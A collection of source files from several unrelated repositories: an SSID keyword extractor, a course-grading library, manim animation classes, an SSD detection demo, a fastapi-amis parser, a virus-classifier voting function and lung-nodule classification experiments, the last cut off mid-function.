ssid = l[0].strip().lower().replace(".","").replace(" ","").replace("_","").replace("-","") #去掉空格,转成小写,去掉 空格 . _ -
#print ssid
shop = l[1]
cnt = l[2]
#print shop
if shop in dict_shop_ssid.keys():
temp_dict = dict_shop_ssid[shop]
if ssid in temp_dict.keys():
temp_dict[ssid] = int(temp_dict[ssid]) + int(cnt)
else :
temp_dict[ssid] = cnt
else:
temp = {}
temp[ssid] = cnt
dict_shop_ssid[shop] = temp
#输出dict {shop1:{ssid1:cnt1,ssid2:cnt2,……}, shop2:...}
# for key, value in dict_shop_ssid.iteritems():
# print key,value
#第一次粗略计算的keys
print 'first output result:'
dict_key_all = {}
for shop in dict_shop_ssid.keys():
temp_dict = dict_shop_ssid[shop]
temp_dict_keys = extract_keywords(temp_dict,2)
dict_key_all[shop] = temp_dict_keys
print shop,dict_key_all[shop]
#输出dict {shop1:[ssid1,ssid2,……], shop2:...}
# print 'output dict_key_all:'
# for key, value in dict_key_all.iteritems():
# print key,value
#第二次计算,过滤掉shop间的高频关键字
list_fre_keys = find_unused_fre_key(dict_key_all) #shop间的高频关键词
for key,value in dict_key_all.items():
dict_key_all[key] = diff(list_fre_keys,dict_key_all[key]) #在dict_key_all[key]过滤掉高频关键词
#第三次计算,过滤掉路由器
#list_unused 常用路由器list,转小写
for i in range(len(list_unused)):
list_unused[i] = list_unused[i].lower().replace(".","").replace(" ","").replace("_","").replace("-","")
for key,value in dict_key_all.items():
dict_key_all[key] = diff(list_unused,dict_key_all[key]) #在dict_key_all[key]过滤掉常用路由器list
#dict_key_all为最后结果
#输出dict {shop1:[ssid1,ssid2,……], shop2:...}
print 'output dict_key_all:'
for key, value in dict_key_all.iteritems():
print key,value
print 'save result to a txt:'
fileObject = open('keywords_1.txt','w')
for key in dict_key_all:
fileObject.write(key)
fileObject.write('|')
fileObject.write(str(dict_key_all[key]))
fileObject.write('\n')
fileObject.close()
``` |
{
"source": "61c-teach/TotalCoursePoints",
"score": 3
} |
#### File: TotalCoursePoints/TotalCoursePoints/group.py
```python
from .assignment import Assignment, StudentAssignmentData
from .student import Student
from typing import List, Callable
class Group(Assignment):
"""
This class will allow you to group together different assignments in one assignment.
Score merger will take in all the Student Assignment Datas for a single student and generate a StudentAssignmentData from it.
"""
def __init__(self, id: str, category, score_merger: Callable[[List[StudentAssignmentData]], StudentAssignmentData], assignments: List[Assignment]=[], *args, **kwargs):
self.assignments = assignments
self.score_merger = score_merger
super().__init__(id, category, *args, **kwargs)
def has_assignment(self, assignment: Assignment):
return assignment not in self.assignments
def add_assignment(self, assignment: Assignment):
if self.has_assignment(assignment):
raise ValueError(f"Group already contains the assignment: {assignment}")
self.assignments.append(assignment)
def load(self):
tmp = f": {self.name}" if self.name is not None else ""
load_str = f"Loading group {self.id}{tmp}..."
load_str_done = load_str + "Done!"
print(load_str)
for assignment in self.assignments:
assignment.load()
self.data_loaded = self.data_loaded or assignment.data_loaded
seen_students = set()
for assignment in self.assignments:
scores = assignment.data.values()
for _score in scores:
if not isinstance(_score, list):
_score = [_score]
for score in _score:
student = (score.name, score.sid, score.email)
if student in seen_students:
continue
seen_students.add(student)
sid = student[1]
email = student[2]
std = Student(student[0], sid, email)
asmts = []
group_msg = "Groupped Assignments:\n" + ("~" * 20) + "\n"
for a in self.assignments:
sad = a.get_student_data(std)
asmts.append(sad)
group_msg += sad.get_str().replace("*", ".").replace("-", "_")
group_msg += "\n" + ("~" * 20) + "\n"
new_sad = self.score_merger(asmts)
new_sad.assignment = self
self.all_scores.append(new_sad.score)
self.scores.append(new_sad.score)
if not isinstance(new_sad, StudentAssignmentData):
raise ValueError("Score merger function must return a StudentAssignmentData object")
new_sad.personal_comment = group_msg + new_sad.personal_comment
dat = self.data.get(sid)
if dat is None:
self.data[sid] = new_sad
else:
if isinstance(dat, list):
dat.append(new_sad)
else:
self.data[sid] = [dat, new_sad]
if sid in self.data:
if isinstance(self.data[sid], list):
self.data[sid].append(new_sad)
edat = self.edata.get(email)
if edat is None:
self.edata[email] = new_sad
else:
if isinstance(email, list):
edat.append(new_sad)
else:
self.edata[email] = [edat, new_sad]
if email in self.edata:
if isinstance(self.edata[email], list):
self.edata[email].append(new_sad)
print(load_str_done)
```
#### File: TotalCoursePoints/TotalCoursePoints/student.py
```python
from __future__ import annotations
import json
from . import GradeBins, PNP
from typing import Union
class Student:
def __init__(self, name: str, sid: str, email: str, active_student: bool=True, grade_status: str="GRD", extensionData: dict={}, secret: str=None, incomplete: bool=False):
self.name = name
self.sid = str(sid)
self.email = email
self.active_student = active_student
self.categoryData = {}
self.extensionData = extensionData
self.incomplete = incomplete
self.grade_status = grade_status
self.override_score = None
# FIXME Parse extension data!
if not extensionData:
self.extensionData = {}
if isinstance(self.extensionData, str):
try:
self.extensionData = json.loads(self.extensionData)
except Exception as exc:
import traceback
traceback.print_exc()
print(exc)
self.extensionData = {}
self.secret = secret
self.reset_comment()
def set_override_score(self, score):
# Set raw score of student. If set to None, it will be ignored.
if not (isinstance(score, (int, float)) or score is None):
raise ValueError("Score must be int, float, or None")
self.override_score = score
def append_comment(self, *args, sep=' ', end='\n'):
self.personal_comment += sep.join(args) + end
def reset_comment(self):
self.personal_comment = ""
def get_comment(self):
return self.personal_comment
def is_for_grade(self):
return self.grade_status == "GRD" and not self.incomplete
def __repr__(self):
return self.__str__()
def __str__(self):
return "<Name: {}, SID: {}, Email: {}, Secret: {}, Total Points: {}>".format(self.name, self.sid, self.email, self.secret, str(self.total_points()))
def is_auth(self, sid: str, secret: str) -> bool:
return str(sid) == self.sid and (self.secret == secret or self.secret is None)
def add_assignment_data(self, data: StudentAssignmentData):
cat = data.assignment.category.name
if cat not in self.categoryData:
self.categoryData[cat] = []
self.categoryData[cat].append(data)
def add_category_data(self, data: StudentCategoryData):
self.categoryData[data.category.name] = data
def total_points(self, with_hidden=False, c=None):
if self.override_score is not None:
return self.override_score
ignore_categories = set([])
if c is not None:
ignore_categories = c.get_ignore_category()
tp = 0
for c in self.categoryData.values():
if c.category.name in ignore_categories:
continue
tp += c.get_total_score(with_hidden=with_hidden)
return tp
def get_assignment_data(self, assignment: Assignment) -> Assignment:
cat = self.categoryData.get(assignment.category.name)
if cat is None:
return None
return cat.get_assignment_data(assignment)
# for a in cat:
# if a.assignment == assignment:
# return a
# return None
def get_category_data(self, category: Union[Category, str]) -> Category:
if isinstance(category, Category):
category = category.name
return self.categoryData.get(category)
def get_total_points_with_class(self, c, with_hidden=False) -> float:
tp = c.get_total_possible()
if tp == 0:
tp = 1
return self.total_points(c=c, with_hidden=with_hidden) + (c.get_raw_additional_pts() * (c.get_total_possible(only_inputted=True) / tp))
def get_grade(self, c, score=None, with_hidden=False, ignore_pnp=False) -> str:
if self.incomplete:
return "I"
if score is None:
score = self.get_total_points_with_class(c, with_hidden=with_hidden)
if not ignore_pnp and not self.is_for_grade() and self.grade_status in PNP.PNP_Types.keys():
pnp = PNP.PNP_Types[self.grade_status]
if c.grade_bins.is_passing(score, self.grade_status):
return pnp.pass_value
else:
return pnp.not_pass_value
b = c.grade_bins.in_bin(score)
return b.id
def get_approx_grade_id(self, c, score=None, with_hidden=False, ignore_pnp=False) -> str:
if self.incomplete:
return "I"
if score is None:
score = self.get_total_points_with_class(c, with_hidden=with_hidden)
cur_score = score
cur_max_score = c.get_total_possible(only_inputted=True)
if not ignore_pnp and not self.is_for_grade() and self.grade_status in PNP.PNP_Types.keys():
pnp = PNP.PNP_Types[self.grade_status]
score = c.grade_bins.relative_score(cur_score, cur_max_score)
if c.grade_bins.is_passing(score, self.grade_status):
return pnp.pass_value
else:
return pnp.not_pass_value
b = c.grade_bins.relative_bin(cur_score, cur_max_score)
return b.id
def get_approx_grade(self, c, show_exact_grade: bool=True) -> str:
cur_score = self.get_total_points_with_class(c)
cur_max_score = c.get_total_possible(only_inputted=True)
b = c.grade_bins.relative_bin(cur_score, cur_max_score)
return f"You are on track for a(n) {b.id} based off of the {cur_max_score} points entered."
def apply_extensions(self):
for ext_cat_key, value in self.extensionData.items():
cat = self.categoryData.get(ext_cat_key)
if cat is None:
continue
for ext_assign, value in value.items():
assign = cat.get_assignment_data(ext_assign)
if assign is None:
continue
assign.extension_time = value
def apply_slip_time(self):
for cat in self.categoryData.values():
cat.apply_slip_time()
def drop_lowest_assignments(self):
for cat in self.categoryData.values():
cat.drop_lowest_assignments()
def main_results_str(self, c, include_rank=False):
grade_info = self.get_grade(c)
if not c.all_inputted():
grade_info += "\n" + self.get_approx_grade(c)
rank_str = ""
if include_rank:
rank, total = c.get_student_ranking(self)
rank_str = f"Rank: {rank} / {total}\n"
personal_comment = self.get_comment()
if len(personal_comment) > 0:
personal_comment = "\n\n" + personal_comment
return f"{c.get_welcome()}{c.get_comment()}SID: {self.sid}\nemail: {self.email}\n\nTotal Points: {self.get_total_points_with_class(c)} / {c.get_total_possible()}\n{rank_str}Grade: {grade_info}{personal_comment}"
def dump_data(self, results_file: str, data: dict) -> None:
jsondata = json.dumps(data, ensure_ascii=False)
with open(results_file, "w") as f:
f.write(jsondata)
def dump_str(self, c, class_dist: bool=False, class_stats_all: bool=False, class_stats_graded: bool=False, include_rank=False):
tests = []
results = {
"score":self.get_total_points_with_class(c),
"tests":tests
}
if c.gs_leaderboard:
results["leaderboard"] = {
"name": "Total Score",
"value": results["score"]
}
tests.append({"name":"Total", "output": self.main_results_str(c, include_rank=include_rank)})
if class_dist or class_stats_all or class_stats_graded:
stats_str = ""
if class_stats_graded:
title = "Class Statistics (Graded):"
stats_str += f"{title}\n" + ("-" * len(title)) + "\n"
stats_str += c.get_class_points_stats_str()
stats_str += "\n"
if class_stats_all:
title = "Class Statistics (All):"
stats_str += f"{title}\n" + ("-" * len(title)) + "\n"
stats_str += c.get_class_points_stats_str(only_for_grade=False)
stats_str += "\n"
if class_dist:
if class_stats_all or class_stats_graded:
stats_str += ("_" * 35) + ("\n" * 2)
stats_str += c.get_class_statistics_str()
tests.append({"name": "Class Stats", "output": stats_str})
for cat in self.categoryData.values():
if not cat.is_hidden():
score = cat.get_total_score(ignore_not_for_points=True)
tests.append({
"name": cat.category.name,
"output": cat.get_str(score=score),
"score": round(score, 4),
"max_score": round(cat.category.get_total_possible(), 4)
})
return results
def dump_result(self, c, class_dist: bool=False, class_stats_all: bool=False, class_stats_graded: bool=False, include_rank=False, results_file:str="/autograder/results/results.json"):
results = self.dump_str(c, class_dist=class_dist, class_stats_all=class_stats_all, class_stats_graded=class_stats_graded, include_rank=include_rank)
self.dump_data(results_file, results)
def get_raw_data(self, c, approx_grade: bool=False, with_hidden=True):
score = self.get_total_points_with_class(c, with_hidden=with_hidden)
data = {
"name": self.name,
"sid": self.sid,
"email": self.email,
"grade": self.get_approx_grade_id(c, score=score, with_hidden=with_hidden) if approx_grade else self.get_grade(c, with_hidden=with_hidden),
"score": score,
"Grading Basis": self.grade_status
}
for cat in self.categoryData.values():
for assign in cat.assignments_data:
data[f"{cat.category.name}/{assign.assignment.id}"] = assign.get_course_points()
return data
from .assignment import Assignment, StudentAssignmentData
from .category import Category, StudentCategoryData
``` |
{
"source": "61smiling/algorithm-stone",
"score": 2
} |
#### File: animations/src/algo_logo.py
```python
from manimlib import *
class AlgoLogoShield(VMobject):
def __init__(self, **kwargs):
super().__init__(**kwargs)
def init_points(self):
start = ORIGIN
self.append_points(Line([3., -1., 0.], [0.0, 0., 0.]).get_points())
self.append_points(Line([0.0, 0., 0.], [-3., -1., 0.]).get_points())
v = CubicBezier(
[-3, -1, 0],
[-3.06, -3.51, 0],
[-2.14, -5.19, 0],
[0, -6.5, 0],
)
v2 = CubicBezier(
[0, -6.5, 0],
[2.14, -5.19, 0],
[3.06, -3.51, 0],
[3, -1, 0],
)
self.append_points(v.get_points())
self.append_points(v2.get_points())
self.center()
class AlgoLogo(VGroup):
def __init__(self, *vmobjects, **kwargs):
super().__init__(*vmobjects, **kwargs)
self.add(AlgoLogoShield(fill_color="#4386f7", fill_opacity = 1, stroke_width=0).scale(1.06),
AlgoLogoShield(fill_color="#fff", fill_opacity = 1, stroke_width=0, stroke_opacity=0).scale(1.00),
AlgoLogoShield(fill_color="#4386f7", fill_opacity = 1, stroke_width=0, stroke_opacity=0).scale(0.96))
text = Text("A", font="Caladea").scale(5.4)
text.shift(UP*1.2)
self.add(text)
vertices = [
[-3.5, -3.75, 0],
[-3.25, -4.25, 0],
[-3.5, -4.75, 0],
[3.5, -4.75, 0],
[3.25, -4.25, 0],
[3.5, -3.75, 0],
]
back_flag = Polygon(*vertices, fill_color="#4386f7", fill_opacity = 1, stroke_width=0)
back_flag.shift(UP*3.25)
self.add(back_flag)
fore_flag = Rectangle(6, 1, fill_color="#4386f7", fill_opacity = 1, stroke_color="#fff", stroke_width=2, stroke_opacity=1)
fore_flag.shift(DOWN*1.2)
self.add(fore_flag)
self.center()
```
#### File: animations/src/algo_trie.py
```python
from manimlib import *
import networkx as nx
from .algo_vgroup import *
from .algo_node import *
from .algo_tree import *
import numpy
class AlgoTrieTreeNode(AlgoTreeNode):
def __init__(self, tree):
super().__init__(tree)
self.end = False
self.tree = tree
self.color = TEAL_D
self.c = numpy.empty(26, dtype=object)
class AlgoTrieTree(AlgoTree):
def __init__(self, scene, data=[], **kwargs):
self.scene = scene
super().__init__(**kwargs)
# empty
self.root = AlgoTrieTreeNode(self)
self.root.setText("*")
self.ctx.wait_time = 0.5
def add_word(self, word):
self.scene.show_message("插入单词%s"%(word))
p = self.root
nodes = []
for ch in word:
index = ord(ch) - ord('a')
if p.c[index] == None:
p.c[index] = AlgoTrieTreeNode(self)
p.c[index].setText(ch)
self.update_tree()
p = p.c[index]
node = self.get_node(p.id)
old_color = node.get_color()
if node.get_color != RED:
self.scene.play(node.set_color, RED, time=0.5)
nodes.append((node, old_color))
p.end = True
node = self.get_node(p.id)
a = []
for n in nodes:
a.append(ApplyMethod(n[0].set_color, n[1]))
self.scene.play(*a, time=0.5)
node.set_sub("$").set_color(RED).scale(0.5).shift(DR/8)
# overwrite
def calc_tree_data(self):
q = []
q.append(self.root)
nodes = []
edges = []
while len(q)>0:
p = q.pop(0)
self.check_node(p)
nodes.append(p)
for i in range(0, 26):
child = p.c[i]
if child:
self.check_node(child)
self.check_edge(p, child)
edges.append((p.id, child.id))
q.append(child)
return nodes, edges
def query(self, word):
self.scene.show_message("查询单词%s"%(word))
p = self.root
nodes = []
for ch in word:
index = ord(ch) - ord('a')
if not p.c[index]:
return False
p = p.c[index]
node = self.get_node(p.id)
old_color = node.get_color()
if node.get_color != RED:
self.scene.play(node.set_color, RED, time=0.5)
nodes.append((node, old_color))
a = []
for n in nodes:
a.append(ApplyMethod(n[0].set_color, n[1]))
self.scene.play(*a, time=0.5)
if p.end:
self.scene.show_message("结尾符号包含$,查询成功(%s)"%(word))
else:
self.scene.show_message("结尾符号不包含$,查询失败(%s)"%(word))
return p.end
``` |
{
"source": "625135449/SSD-Pytorch",
"score": 2
} |
#### File: SSD-Pytorch/demo/live_img.py
```python
from __future__ import print_function
import torch
from torch.autograd import Variable
import cv2
import time
# from imutils.video import FPS, WebcamVideoStream
import argparse
import sys
from os import path
sys.path.append(path.dirname(path.dirname(path.abspath(__file__))))
from data import BaseTransform, VOC_CLASSES as labelmap
from ssd import build_ssd
#输入模型的绝对地址、修改50line的图片地址、60line的类别数
parser = argparse.ArgumentParser(description='Single Shot MultiBox Detection')
parser.add_argument('--weights', default="/media/vs/qi/data/ssd.pytorch/weights/ssd_VOC_500.pth",
type=str, help='Trained state_dict file path')
parser.add_argument('--cuda', default=False, type=bool,
help='Use cuda in live demo')
args = parser.parse_args()
COLORS = [(255, 0, 0), (0, 255, 0), (0, 0, 255)]
FONT = cv2.FONT_HERSHEY_SIMPLEX
def cv2_demo(net, transform):
def predict(frame):
height, width = frame.shape[:2]
x = torch.from_numpy(transform(frame)[0]).permute(2, 0, 1)
x = Variable(x.unsqueeze(0))
y = net(x) # forward pass
detections = y.data
# scale each detection back up to the image
scale = torch.Tensor([width, height, width, height])
for i in range(detections.size(1)):
j = 0
while detections[0, i, j, 0] >= 0.6:
pt = (detections[0, i, j, 1:] * scale).cpu().numpy()
cv2.rectangle(frame,
(int(pt[0]), int(pt[1])),
(int(pt[2]), int(pt[3])),
COLORS[i % 3], 2)
cv2.putText(frame, labelmap[i - 1], (int(pt[0]), int(pt[1])),
FONT, 1, (255, 0, 255), 2, cv2.LINE_AA)
j += 1
return frame
frame = cv2.imread('/media/vs/qi/data/ssd.pytorch/doc/helmet01.jpg')
frame = predict(frame)
window_name = 'Object detector'
cv2.namedWindow(window_name, 0)
cv2.resizeWindow(window_name, 640, 640)
cv2.imshow(window_name, frame)
# cv2.imshow('frame', frame)
if __name__ == '__main__':
net = build_ssd('test', 300, 3) # initialize SSD , 3为类别数
net.load_state_dict(torch.load(args.weights))
transform = BaseTransform(net.size, (104 / 256.0, 117 / 256.0, 123 / 256.0))
cv2_demo(net.eval(), transform)
# Press any key to close the image
cv2.waitKey()
# cleanup
cv2.destroyAllWindows()
``` |
{
"source": "625412505/fastapi_amis_admin",
"score": 2
} |
#### File: fastapi_amis_admin/amis_admin/parser.py
```python
import datetime
from pydantic import Json
from pydantic.fields import ModelField
from pydantic.utils import smart_deepcopy
from fastapi_amis_admin.amis.components import FormItem, Remark, Validation, InputNumber, TableColumn
from fastapi_amis_admin.models.enums import Choices
class AmisParser():
def __init__(self, modelfield: ModelField):
self.modelfield = modelfield # read only
@property
def label(self):
return self.modelfield.field_info.title or self.modelfield.name
@property
def remark(self):
return Remark(
content=self.modelfield.field_info.description) if self.modelfield.field_info.description else None
def as_form_item(self, set_deafult: bool = False, is_filter: bool = False) -> FormItem:
# sourcery no-metrics
kwargs = {}
formitem = self.modelfield.field_info.extra.get(['amis_form_item', 'amis_filter_item'][is_filter])
if formitem is not None:
formitem = smart_deepcopy(formitem)
if isinstance(formitem, FormItem):
pass
elif isinstance(formitem, dict):
kwargs = formitem
formitem = FormItem(**kwargs) if kwargs.get('type') else None
elif isinstance(formitem, str):
formitem = FormItem(type=formitem)
else:
formitem = None
if formitem is not None:
pass
elif self.modelfield.type_ == str:
kwargs['type'] = 'input-text'
elif issubclass(self.modelfield.type_, Choices):
kwargs.update({
'type': 'select',
'options': [{'label': l, 'value': v} for v, l in self.modelfield.type_.choices],
'extractValue': True,
'joinValues': False,
})
if not self.modelfield.required:
kwargs['clearable'] = True
elif issubclass(self.modelfield.type_, bool):
kwargs['type'] = 'switch'
elif is_filter:
if issubclass(self.modelfield.type_, datetime.datetime):
kwargs['type'] = 'input-datetime-range'
kwargs['format'] = 'YYYY-MM-DD HH:mm:ss'
# 给筛选的 DateTimeRange 添加 today 标签
kwargs['ranges'] = "today,yesterday,7daysago,prevweek,thismonth,prevmonth,prevquarter"
elif issubclass(self.modelfield.type_, datetime.date):
kwargs['type'] = 'input-date-range'
kwargs['format'] = 'YYYY-MM-DD'
elif issubclass(self.modelfield.type_, datetime.time):
kwargs['type'] = 'input-time-range'
kwargs['format'] = 'HH:mm:ss'
else:
kwargs['type'] = 'input-text'
elif issubclass(self.modelfield.type_, int):
formitem = InputNumber(precision=0, validations=Validation(isInt=True))
elif issubclass(self.modelfield.type_, float):
formitem = InputNumber(validations=Validation(isFloat=True))
elif issubclass(self.modelfield.type_, datetime.datetime):
kwargs['type'] = 'input-datetime'
kwargs['format'] = 'YYYY-MM-DDTHH:mm:ss'
elif issubclass(self.modelfield.type_, datetime.date):
kwargs['type'] = 'input-date'
kwargs['format'] = 'YYYY-MM-DD'
elif issubclass(self.modelfield.type_, datetime.time):
kwargs['type'] = 'input-time'
kwargs['format'] = 'HH:mm:ss'
elif issubclass(self.modelfield.type_, Json):
kwargs['type'] = 'json-editor'
else:
kwargs['type'] = 'input-text'
formitem = formitem or FormItem(**kwargs)
if not is_filter:
if self.modelfield.field_info.max_length:
formitem.maxLength = self.modelfield.field_info.max_length
if self.modelfield.field_info.min_length:
formitem.minLength = self.modelfield.field_info.min_length
formitem.required = self.modelfield.required
if set_deafult and self.modelfield.default is not None:
formitem.value = self.modelfield.default
formitem.name = self.modelfield.alias
formitem.label = formitem.label or self.label
formitem.labelRemark = formitem.labelRemark or self.remark
return formitem
def as_table_column(self) -> TableColumn:
kwargs = {}
column = self.modelfield.field_info.extra.get('amis_table_column')
if column is not None:
column = smart_deepcopy(column)
if isinstance(column, TableColumn):
pass
elif isinstance(column, dict):
kwargs = column
column = TableColumn(**kwargs) if kwargs.get('type') else None
elif isinstance(column, str):
column = TableColumn(type=column)
else:
column = None
if column is not None:
pass
elif self.modelfield.type_ == str:
pass
elif issubclass(self.modelfield.type_, bool):
kwargs['type'] = 'switch'
elif issubclass(self.modelfield.type_, datetime.datetime):
kwargs['type'] = 'datetime'
elif issubclass(self.modelfield.type_, datetime.date):
kwargs['type'] = 'date'
elif issubclass(self.modelfield.type_, datetime.time):
kwargs['type'] = 'time'
elif issubclass(self.modelfield.type_, Choices):
kwargs['type'] = 'mapping'
kwargs['map'] = dict(self.modelfield.type_.choices)
column = column or TableColumn(**kwargs)
column.name = self.modelfield.alias
column.label = column.label or self.label
column.remark = column.remark or self.remark
column.sortable = True
return column
``` |
{
"source": "627oldcat/CNN_Virus",
"score": 3
} |
#### File: 627oldcat/CNN_Virus/voting.py
```python
import collections
def get_final_result(labels,probs1,loc,probs2):
valid_labels=[]
valid_loc=[]
for i in range(len(probs1)):
if float(probs1[i])>=0.9:
valid_labels.append(labels[i])
valid_loc.append(loc[i])
if len(valid_labels)==0:
return "187","10"
else:
d_count={}
for i in range(len(valid_labels)):
if valid_labels[i] in d_count:
d_count[valid_labels[i]].append(valid_loc[i])
else:
d_count[valid_labels[i]]=[]
d_count[valid_labels[i]].append(valid_loc[i])
counter=collections.Counter(valid_labels)
true_label=counter.most_common(1)[0][0]
counter_loc=collections.Counter(d_count[true_label])
true_loc=counter_loc.most_common(1)[0][0]
return true_label,true_loc
``` |
{
"source": "628014/local-global-master",
"score": 2
} |
#### File: 628014/local-global-master/experiments.py
```python
import torch
from torch.backends import cudnn
from kflod import kfold
import numpy as np
import random
from torch.optim.adam import Adam
from resnet_attn import *
from torchvision.models.resnet import resnet50, resnet18
from torchvision.models.densenet import densenet121
from preprocessing import get_dataset3d
import sys
def reset_rand():
seed = 1000
T.manual_seed(seed)
T.cuda.manual_seed(seed)
np.random.seed(seed)
random.seed(seed)
# AllAtn网络 86.18%
def expAllAtn(data_path):
reset_rand()
def model_opt():
model = AllAtn()
optm = Adam(model.parameters())
return model, optm
kfold(data_path,
256,
50,
model_optimizer=model_opt,
loss=nn.BCELoss(),
name='AllAtn',
device='cuda:0',
deterministic=True
)
# 基本的Resnet网络 93.42%
def expBasicResnet(data_path):
reset_rand()
def model_opt():
model = BasicResnet()
optm = Adam(model.parameters())
return model, optm
kfold(data_path,
256,
50,
model_optimizer=model_opt,
loss=nn.BCELoss(),
name='BasicResnet',
device='cuda:0',
deterministic=True
)
# 论文定义的网络 95.62%
# 我们建议使用具有 3x3 内核大小的 Residual Blocks 进行局部特征提取,并使用 Non-Local Blocks 来提取全局特征。Non-Local Block
# 能够在不使用大量参数的情况下提取全局特征。Non-Local Block 背后的关键思想是在相同特征映射上的特征之
def expLocalGlobal(data_path):
reset_rand()
def model_opt():
model = LocalGlobalNetwork()
optm = Adam(model.parameters())
return model, optm
kfold(data_path,
64,
50,
model_optimizer=model_opt,
loss=nn.BCELoss(),
name='LocalGlobalNetwork',
device='cuda:0',
deterministic=True
)
# AllAtnBig网络 85.89%
def expAllAtnBig(data_path):
reset_rand()
def model_opt():
model = AllAtnBig()
optm = Adam(model.parameters())
return model, optm
kfold(data_path,
256,
50,
model_optimizer=model_opt,
loss=nn.BCELoss(),
name='AllAtnBig',
device='cuda:0',
deterministic=True
)
# resnet50网络 86.82%
def expResnetTrans(data_path):
reset_rand()
def model_opt():
model = resnet50(pretrained=True)
model.avgpool = nn.AdaptiveAvgPool2d((1, 1))
model.fc = nn.Sequential(
nn.Linear(model.fc.in_features, 1),
nn.Sigmoid()
)
optm = Adam(model.fc.parameters())
return model, optm
kfold(data_path,
256,
50,
model_optimizer=model_opt,
loss=nn.BCELoss(),
name='ResnetTrans',
device='cuda:0',
deterministic=True,
dataset_func=get_dataset3d
)
# densenet121网络 92.50%
def expDensenetTrans(data_path):
reset_rand()
def model_opt():
model = densenet121(pretrained=True)
# model.avgpool = nn.AdaptiveAvgPool2d((1, 1))
model.classifier = nn.Sequential(
nn.Linear(model.classifier.in_features, 1),
nn.Sigmoid()
)
optm = Adam(model.classifier.parameters())
return model, optm
kfold(data_path,
256,
50,
model_optimizer=model_opt,
loss=nn.BCELoss(),
name='DensenetTrans',
device='cuda:0',
deterministic=True,
dataset_func=get_dataset3d
)
# resnet18 网络 86.41%
def expResnet18Trans(data_path):
reset_rand()
def model_opt():
model = resnet18(pretrained=True)
model.avgpool = nn.AdaptiveAvgPool2d((1, 1))
model.fc = nn.Sequential(
nn.Linear(model.fc.in_features, 1),
nn.Sigmoid()
)
optm = Adam(model.fc.parameters())
return model, optm
kfold(data_path,
256,
50,
model_optimizer=model_opt,
loss=nn.BCELoss(),
name='Resnet18Trans',
device='cuda:1',
deterministic=True,
dataset_func=get_dataset3d
)
def print_error():
print(f'python <model_name> <data_path>')
print('here is a list of experiments names:')
for name in experiments.keys():
print(name)
if __name__ == '__main__':
cudnn.benchmark = True
torch.backends.cudnn.deterministic = False
torch.backends.cudnn.enabled = True
experiments = {
'Resnet18Trans': expResnet18Trans,
'ResnetTrans': expResnetTrans,
'AllAtnBig': expAllAtnBig,
'LocalGlobal': expLocalGlobal,
'BasicResnet': expBasicResnet,
'AllAtn': expAllAtn,
'DensenetTrans': expDensenetTrans
}
if len(sys.argv) < 3:
print('Error, we expect two arguments')
print_error()
else:
exp_name = sys.argv[1]
data_path = sys.argv[2]
if exp_name not in experiments:
print('Unknow experiment name')
print_error()
else:
experiments[exp_name](data_path)
# 在cmd 运行 : python experiments.py LocalGlobal E:\课程学习\大二\大二下机器学习\小项目\肺分类\lidc_img
```
#### File: 628014/local-global-master/preprocessing.py
```python
import numpy as np
import torch as t
from torch.utils.data import TensorDataset
from imageio import imread
from PIL import Image, ImageFilter, ImageFile
ImageFile.LOAD_TRUNCATED_IMAGES = True
import pandas as pd
import os
from os import path
img_size = 32
class Augmenter:
def __init__(self, hflip=True, rotate=True, blurring=False):
self.hflip = hflip
self.rotate = rotate
self.blurring = blurring
def extract_mutiview(self, voxel):
x, y, z = voxel.shape
return [voxel[x // 2, :, :],
voxel[:, y // 2, :],
voxel[:, :, z // 2]]
def augment(self, voxel):
for view in self.extract_mutiview(voxel):
im = Image.fromarray(view, mode='L')
yield im
if self.hflip:
yield im.transpose(Image.FLIP_LEFT_RIGHT)
if self.rotate:
yield im.transpose(Image.ROTATE_90)
yield im.transpose(Image.ROTATE_180)
yield im.transpose(Image.ROTATE_270)
if self.blurring:
yield im.filter(ImageFilter.GaussianBlur(1))
def resize(im):
im = im.crop((8, 8, 40, 40))
return im
def generate_dataset(dir):
df = pd.read_csv(dir + '/labels.csv')
df['testing'] = 1
voxels = np.zeros((len(df), 48, 48, 48), dtype=np.uint8)
augmenter = Augmenter(hflip=True, rotate=True, blurring=True)
augmenter2 = Augmenter(hflip=False, rotate=False, blurring=False)
for i, row in df.iterrows():
voxels[int(row.id)] = np.load('{0}/{1:.0f}.npy'.format(dir, row.id))
for i in range(10):
folder = '{0}/{1}/'.format(dir, i)
if not os.path.exists(folder):
os.makedirs(folder)
tests = df[df.fold == i].copy()
trains = df[df.fold != i].copy()
trains.testing = 0
new_df = pd.concat([tests, trains])
new_df.to_csv(folder + '/labels.csv', index=False)
for j, row in tests.iterrows():
voxel = voxels[int(row.id)]
for e, im in enumerate(augmenter2.augment(voxel)):
im2 = resize(im)
im2.save('{0}{1:.0f}.{2}.png'.format(folder, row.id, e))
for j, row in trains.iterrows():
voxel = voxels[int(row.id)]
for e, im in enumerate(augmenter.augment(voxel)):
im2 = resize(im)
im2.save('{0}{1:.0f}.{2}.png'.format(folder, row.id, e))
def get_dataset(dir):
df = pd.read_csv(path.join(dir, 'labels.csv'))
df_test = df[df.testing == 1]
df_train = df[df.testing == 0]
num_data = len(df_train)
aug_size = 18
x = t.zeros((num_data * aug_size, 1, img_size, img_size))
y = t.zeros((num_data * aug_size, 1))
c = 0
for i, row in df_train.iterrows():
id = int(row.id)
for j in range(aug_size):
im = imread(path.join(dir, f'{id:.0f}.{j}.png'))
x[c * aug_size + j, 0, :, :] = t.from_numpy(im)
y[c * aug_size + j][0] = row.malignancy_th
c += 1
mu = x.mean()
sd = x.std()
x = (x - mu) / sd
trainset = TensorDataset(x, y)
aug_size = 3
num_data = len(df_test)
x = t.zeros((num_data * aug_size, 1, img_size, img_size))
y = t.zeros((num_data * aug_size, 1))
c = 0
for i, row in df_test.iterrows():
id = int(row.id)
for j in range(aug_size):
im = imread(path.join(dir, f'{id:.0f}.{j}.png'))
x[c * aug_size + j, 0, :, :] = t.from_numpy(im)
y[c * aug_size + j][0] = row.malignancy_th
c += 1
x = (x - mu) / sd
testset = TensorDataset(x, y)
return trainset, testset
def get_dataset3d(dir):
df = pd.read_csv(path.join(dir, 'labels.csv'))
df_test = df[df.testing == 1]
df_train = df[df.testing == 0]
num_data = len(df_train)
aug_size = 18
x = t.zeros((num_data * aug_size, 3, img_size, img_size))
y = t.zeros((num_data * aug_size, 1))
c = 0
for i, row in df_train.iterrows():
id = int(row.id)
for j in range(aug_size):
im = imread(path.join(dir, f'{id:.0f}.{j}.png'))
x[c * aug_size + j, 0, :, :] = t.from_numpy(im)
y[c * aug_size + j][0] = row.malignancy_th
x[c * aug_size + j, 1, :, :] = x[c * aug_size + j, 0, :, :]
